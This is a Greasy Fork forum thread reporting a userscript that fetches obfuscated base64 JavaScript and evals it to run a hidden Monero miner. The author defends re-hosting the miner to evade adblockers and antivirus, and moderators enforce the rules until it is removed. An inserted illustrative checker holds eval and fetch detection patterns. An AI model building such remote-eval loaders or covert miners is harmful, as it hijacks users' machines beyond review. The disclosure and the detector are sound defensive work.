External, base64-encoded, obfuscated, and minified JavaScript

About: Gamdom Rain Notifier [Preview]
This script makes an ajax request to get base64-encoded text which is prefixed by the eval, decodeURIComponent, escape, and atob method names. It then calls eval on the text (line https://greasyfork.org/en/scripts/38993-gamdom-rain-notifier/code#n74), resulting in an obfuscated and minified script. URL of the ajax request: https://www.gamdomrain.com/voteme/xxx.js
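A reviewer-side check for the pattern reported above, added here as an illustration and not part of the original post or of the script under discussion: it flags a userscript that both fetches remote text and evaluates it, lists script URLs on hosts outside an allowlist, and unwraps the `eval(decodeURIComponent(escape(atob(...))))` layer for reading without executing it. The function names, the allowlist and both sample inputs are assumptions made up for the example.

```javascript
// Added example. reviewUserscript, peelLayer, ALLOWED_HOSTS and both samples are
// hypothetical; ALLOWED_HOSTS is an assumed allowlist, not Greasy Fork's real one.
const ALLOWED_HOSTS = new Set(['cdn.example.org']);
const SINK = /\beval\s*\(|\bnew\s+Function\s*\(/;
const FETCHER = /\b(?:GM_xmlhttpRequest|XMLHttpRequest|fetch)\b|\$\.(?:ajax|get)\b/;
const SCRIPT_URL = /https?:\/\/[^\s'"`)]+\.js\b/g;
// The wrapper the report describes: eval(decodeURIComponent(escape(atob("<base64>")))).
const WRAPPER = /^\s*eval\(\s*decodeURIComponent\(\s*escape\(\s*(?:window\.)?atob\(\s*(['"])([A-Za-z0-9+\/=]+)\1\s*\)\s*\)\s*\)\s*\)\s*;?\s*$/;

// Static pass over userscript source; nothing is downloaded or executed.
function reviewUserscript(source) {
  const findings = [];
  let fetches = false, evals = false;
  source.split('\n').forEach((text, i) => {
    const meta = /^\s*\/\//.test(text);
    if (meta && !/@require|@resource/.test(text)) return; // comments, @match, @name...
    if (!meta && FETCHER.test(text)) fetches = true;
    if (!meta && SINK.test(text)) {
      evals = true;
      findings.push({ line: i + 1, rule: 'eval-sink' });
    }
    for (const [url] of text.matchAll(SCRIPT_URL)) {
      const host = new URL(url).hostname;
      if (!ALLOWED_HOSTS.has(host)) findings.push({ line: i + 1, rule: 'external-host', host });
    }
  });
  // Fetch plus eval means the code a reviewer read is not the code that runs.
  return { remoteEval: fetches && evals, findings };
}

// Recover the wrapped source for reading without calling eval on it.
// decodeURIComponent(escape(atob(x))) is base64 decoding followed by UTF-8 decoding.
function peelLayer(payload) {
  const m = WRAPPER.exec(payload);
  return m ? Buffer.from(m[2], 'base64').toString('utf8') : null;
}

// Constructed inputs: a userscript that evals fetched text, and a harmless wrapped payload.
const SAMPLE_SCRIPT = [
  '// ==UserScript==',
  '// @match    https://site.example/*',
  '// @require  https://cdn.example.org/lib.min.js',
  '// ==/UserScript==',
  'GM_xmlhttpRequest({ method: "GET", url: "https://scripts.example.net/loader.js",',
  '  onload: function (r) { eval(r.responseText); } });',
].join('\n');
const INNER = 'console.log("second stage");';
const SAMPLE_PAYLOAD = 'eval(decodeURIComponent(escape(atob("' + Buffer.from(INNER).toString('base64') + '"))));';
console.log(reviewUserscript(SAMPLE_SCRIPT), peelLayer(SAMPLE_PAYLOAD));
```

A clean result from one fetch says nothing about the next one, which is why the check treats the fetch-and-eval pattern itself as the finding rather than the content of any single payload.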

Comments

  • It's a Monero miner to pay hosting and server costs.
    It only uses between 25-35% CPU.
    It's said in the script description.
    If you don't like using a little bit of CPU only when the script is running, don't use it.
    And as I said: it's for paying hosting and server costs. Don't like it? Don't use it. Simple.
  • AllInRed said:

    It's a Monero miner to pay hosting and server costs.
    It only uses between 25-35% CPU.
    It's said in the script description.
    If you don't like using a little bit of CPU only when the script is running, don't use it.
    And as I said: it's for paying hosting and server costs. Don't like it? Don't use it. Simple.

    And that code is not made by me, it's auto-generated by the "miner" website.
    I just reuploaded it to my own server after asking them for permission, in order to avoid adblockers.
    You can see the "original" script here: https://cdn.minescripts.info/c/g9lx_2.js
    And as I said: it's for paying server and hosting costs. Don't want to use a little of your CPU, don't use it.
    It's said in the script description. And by using it, you're accepting that you will use a little bit of the CPU only when using the script, you will not get CPU usage if you don't use the script, only when using it. Simple.
  • edited March 2018 Chrome
    And, textual words of JasonBarnabe, Greasyfork creator:


    <<As long as it's mentioned in the description, scripts that include a miner are OK (but feel free to rate them accordingly...)>>.
    (he said that here: https://greasyfork.org/en/forum/discussion/comment/41344/#Comment_41344).

    It's mentioned in my script description? Yes.
    So you actually don't have reason to report.
  • Oh, man. I am actually following the rules. And this is my reason to report.
  • Oh, man. I am actually following the rules. And this is my reason to report.

    Well, but as JasonBarnabe said: <<As long as it's mentioned in the description, scripts that include a miner are OK>>.
    So, yes, the script is obfuscated and minified and those things, but it's not even obfuscated by me, it's obfuscated because that's how the website I used to get the miner generates it. All the other things my script uses are not obfuscated or minified. And, as I said multiple times, it's to pay hosting and server costs, I don't even get "profit" for me, because the hashrate it generates just reaches for paying the server and the hosting monthly, and if I get some "profit" for me, it's cents, because I don't generate so much as for having for server & hosting and at the same time for me.
  • Sigh, there is no guarantee that the loaded script isn't malware. Again, read the rules:
    One of the core principles of Greasy Fork is that the user must be able to inspect the code in a script. External scripts can bypass this principle in a number of ways: they can change without warning or history, they can serve up different code to different people, and they can be used to hide malicious code in the middle of known libraries. Even if someone were to check an external script and determine it to be legitimate, that would be no guarantee that that script always has been or always will be legitimate.
  • Sigh, there is no guarantee that the loaded script isn't malware. Again, read the rules:

    One of the core principles of Greasy Fork is that the user must be able to inspect the code in a script. External scripts can bypass this principle in a number of ways: they can change without warning or history, they can serve up different code to different people, and they can be used to hide malicious code in the middle of known libraries. Even if someone were to check an external script and determine it to be legitimate, that would be no guarantee that that script always has been or always will be legitimate.


    I tried to deobfuscate as maximum as possible in 10mins.
    It's just a "normal miner script"(for saying in some way): https://www.gamdomrain.com/voteme/deobfuscatedone.js

    The only reason that I have to use an obfuscated version is because there are people that use miners as virus using like 90% of user CPU and antivirus added miners like virus, and as I said so many times: it's to pay hosting and server costs and I don't have any reason to put any type of malware inside that script.
  • AllInRed said:


    I tried to deobfuscate as maximum as possible in 10mins.
    It's just a "normal miner script"(for saying in some way): https://www.gamdomrain.com/voteme/deobfuscatedone.js

    The only reason that I have to use an obfuscated version is because there are people that use miners as virus using like 90% of user CPU and antivirus added miners like virus, and as I said so many times: it's to pay hosting and server costs and I don't have any reason to put any type of malware inside that script.

    Anyhow, this is an external script that doesn't comply with the existing rules for external scripts. And still not clear code - https://www.gamdomrain.com/voteme/deobfuscatedone.js
  • edited March 2018 Chrome



    AllInRed said:


    I tried to deobfuscate as maximum as possible in 10mins.
    It's just a "normal miner script"(for saying in some way): https://www.gamdomrain.com/voteme/deobfuscatedone.js

    The only reason that I have to use an obfuscated version is because there are people that use miners as virus using like 90% of user CPU and antivirus added miners like virus, and as I said so many times: it's to pay hosting and server costs and I don't have any reason to put any type of malware inside that script.

    Anyhow, this is an external script that doesn't comply with the existing rules for external scripts. And still not clear code - https://www.gamdomrain.com/voteme/deobfuscatedone.js
    Even so, it's not my fault how the miner website(called coin-have.com, but they host scripts on minescripts.info) made the script. I just use it in order to pay server and hosting costs. If they made it obfuscated it's not my fault.
  • As the author of the script you must follow the rules, and you are responsible for what your script does, and what the external scripts it runs do. At the same time you say that it's not your fault that your script runs an external script that doesn't comply with the rules ... sigh
  • edited March 2018 Chrome
    AllInRed said:



    AllInRed said:


    I tried to deobfuscate as maximum as possible in 10mins.
    It's just a "normal miner script"(for saying in some way): https://www.gamdomrain.com/voteme/deobfuscatedone.js

    The only reason that I have to use an obfuscated version is because there are people that use miners as virus using like 90% of user CPU and antivirus added miners like virus, and as I said so many times: it's to pay hosting and server costs and I don't have any reason to put any type of malware inside that script.

    Anyhow, this is an external script that doesn't comply with the existing rules for external scripts. And still not clear code - https://www.gamdomrain.com/voteme/deobfuscatedone.js
    Even so, it's not my fault how the miner website(called coin-have.com, but they host scripts on minescripts.info) made the script. I just use it in order to pay server and hosting costs. If they made it obfuscated it's not my fault.
    By the way,

    Proof of the control panel which shows how much the script is generating, a proof that it's just a mining script and not malware: https://i.gyazo.com/6ca4ef6fc70fd74d3a79aa2b1185beff.png (the one with 453 hashes and almost 0.35XMR won is the miner script that is used)

    Proof that the script is obfuscated by them and not by me: https://i.gyazo.com/9cd69969457f7d016095f4238c305310.png
    (P.S: The _2 suffix, which is the obfuscated one, I know it because after speaking to their telegram '@browserminer' with the coin-have co-owner, he told me that adding a _2 would make a no-antivirus blocked mining script, proof of that: https://i.gyazo.com/953370c8e5537202681eb341b45c651d.png).

    Just a simple miner script. No malware. Just to pay hosting and server costs. I just use it on my script, saying it in the description, and it's not my fault that it's obfuscated.
  • edited March 2018 Chrome

    As the author of the script you must follow the rules, and you are responsible for what your script does, and what the external scripts it runs do. At the same time you say that it's not your fault that your script runs an external script that doesn't comply with the rules ... sigh

    So you want me to give a script for free that needs a server and website to run(both of them cost money every month) and pay it all from my pocket and losing some of my money for offering something for free so users can enjoy it?

    Nice.
  • edited March 2018 Chrome

    As the author of the script you must follow the rules, and you are responsible for what your script does, and what the external scripts it runs do. At the same time you say that it's not your fault that your script runs an external script that doesn't comply with the rules ... sigh

    And there isn't any mining script that is not obfuscated/minified in some way, even coinhive is obfuscated and minified.
  • The way you've added 'the external script' doesn't comply with the rules, and there is no guarantee that the loaded script isn't malware.
  • Sigh, guy. Do it according to the rules, and then everything will be OK.
  • edited March 2018 Chrome

    The way you've added 'the external script' doesn't comply with the rules, and there is no guarantee that the loaded script isn't malware.

    A guarantee that it is not malware is that the "re-uploaded" miner script on my website(gamdomrain.com) is equal to the one hosted at minescripts.info cdn(managed by coin-have.com). And coin-have having money invested on two domains(coin-have.com and minescripts.info) and a VPS used as miner running websocket(wss://ws.pzoifaum.info), and a VPS for mining needs a nice RAM and so many cores, they probably pay around 150$ or even more only for monthly costs.
    I don't think it would be necessary for them to put any type of malware, and after checking the decoded script for a long time I wasn't able to find any type of malware in it. It's a fork of "coinhive.min.js", which has no virus(it's detected by antivirus only because many people use javascript miners badly, putting such a high amount of CPU usage and/or running them on your computer without your knowing). While my "re-uploaded" script(I have permission of coin-have admin to re-upload to my site in order to skip extensions like "No-coin") keeps the same as "https://cdn.minescripts.info/c/g9lx_2.js"(it's easily checkable by downloading both of them and uploading to a diff checker website), it's 99,999% possible that isn't malware, because coin-have having already some fame(not as coinhive, but it has some) I don't think they will add malware, it would be strange to happen and if it reaches to happen(thing which I doubt) they would be discovered soon, and also after talking with the admin, he seems a "cool guy".
    So the <<there is no guarantee that the script is not malware>> it's not so true, maybe there is a 0,001% chance that it becomes malware, but I doubt.
    So meanwhile the "re-uploaded" script keeps the same, almost 0% malware risk...Yes, the script they made it's obfuscated and blah blah blah, but it's just a normal miner script, coinhive fork(coinhive source here: https://github.com/cazala/coin-hive). So almost no malware risk. Already used some few months, even in my own computer, and never got malware/virus/trojan...
    And also, the only thing for which I need to re-upload the file to my own host is just to avoid blacklists of the minescripts.info domain, not to put malware into it.
  • If you said that it isn't malware, then it doesn't mean that it is really not malware, it only means that you said that it isn't. I mean, guy, read the rules again, and again, especially these words:
    Even if someone were to check an external script and determine it to be legitimate, that would be no guarantee that that script always has been or always will be legitimate.
  • If you said that it isn't malware, then it doesn't mean that it is really not malware, it only means that you said that it isn't. I mean, guy, read the rules again, and again, especially these words:

    Even if someone were to check an external script and determine it to be legitimate, that would be no guarantee that that script always has been or always will be legitimate.
    That it's obfuscated/minified doesn't mean it's malware.
    As I'm already tired of getting emails like "remove miner for free" probably I'm going to delete this miner script from my script and put it on the gamdomrain website where this script runs and end of the story.
  • edited March 2018 Firefox
    What's wrong with you? Why can't you understand that the way in which you realise an external script loading allows to load completely different scripts on each run without any changes to the main script (aka Gamdom Rain Notifier) posted on Greasy Fork. And even if someone were to check an external script and determine it to be legitimate, that would be no guarantee that that script always has been or always will be legitimate. - Why can't you understand these words?
    In your case, in order to determine an external script to be legitimate (say, not malware), one MUST check it every time before the main script (Gamdom Rain Notifier) runs. And there's no guarantee that the external script loaded on the next time isn't malware.
  • What's wrong with you? Why can't you understand that the way in which you realise an external script loading allows to load completely different scripts on each run without any changes to the main script (aka Gamdom Rain Notifier) posted on Greasy Fork. And even if someone were to check an external script and determine it to be legitimate, that would be no guarantee that that script always has been or always will be legitimate. - Why can't you understand these words?
    In your case, in order to determine an external script to be legitimate (say, not malware), one MUST check it every time before the main script (Gamdom Rain Notifier) runs. And there's no guarantee that the external script loaded on the next time isn't malware.

    I said I'll remove it from the script itself because I'm tired of receiving "remove miner" emails and I will put it onto the website.
    I have removed it permanently from the other script because the page where the other script works changed its header about 1 week ago in a way that it doesn't accept XHR to sites that aren't "whitelisted", so on that script I'll remove it permanently.

    I will also remove it from this script but I'm going to put it on the website.
    And putting it on the website can be a proof of 0 malware, because for the moment the site is listed at google, and google delists websites on which its "crawler bots" detect malware, and these "crawler bots" normally run at least 1-2 times every week, and you can't exactly know when.
  • Removed this miner from the script itself. Happy now?
  • This looks OK now, but I would like to reiterate:

    1. Your description must describe what the script does. If it includes a miner, you need to say so.
    2. External JS outside of the whitelist is not allowed.
This discussion has been closed.